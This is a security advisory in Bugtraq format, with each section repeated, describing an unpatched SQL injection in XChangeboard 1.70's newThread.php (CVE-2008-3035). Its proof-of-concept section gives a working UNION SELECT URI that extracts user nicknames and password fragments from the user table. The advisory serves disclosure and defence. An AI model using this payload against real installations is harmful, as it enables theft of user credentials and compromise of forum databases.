XChangeboard 'newThread.php' SQL Injection Vulnerability
BID:30059
Info
XChangeboard 'newThread.php' SQL Injection Vulnerability
| Bugtraq ID: | 30059 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-3035 |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 02 2008 12:00AM |
| Updated: | May 07 2015 05:27PM |
| Credit: | haZl0oh |
| Vulnerable: |
XChangeboard XChangeboard 1.70 |
| Not Vulnerable: | |
Discussion
XChangeboard 'newThread.php' SQL Injection Vulnerability
XChangeboard is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
This issue affects XChangeboard 1.70; other versions may also be vulnerable.
XChangeboard is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
This issue affects XChangeboard 1.70; other versions may also be vulnerable.
Exploit / POC
XChangeboard 'newThread.php' SQL Injection Vulnerability
Attackers can exploit these issues via a browser.
The following example URI is available:
http://www.example.com/path/newThread.php?boardID=+999999%20union%20select%20email,concat_ws(0x3a,nick,substring(password,1,100)),email,email,email%20from%20user/*
Attackers can exploit these issues via a browser.
The following example URI is available:
http://www.example.com/path/newThread.php?boardID=+999999%20union%20select%20email,concat_ws(0x3a,nick,substring(password,1,100)),email,email,email%20from%20user/*
Solution / Fix
XChangeboard 'newThread.php' SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
XChangeboard 'newThread.php' SQL Injection Vulnerability
References:
References:
- XChangeboard Homepage (XChangeboard)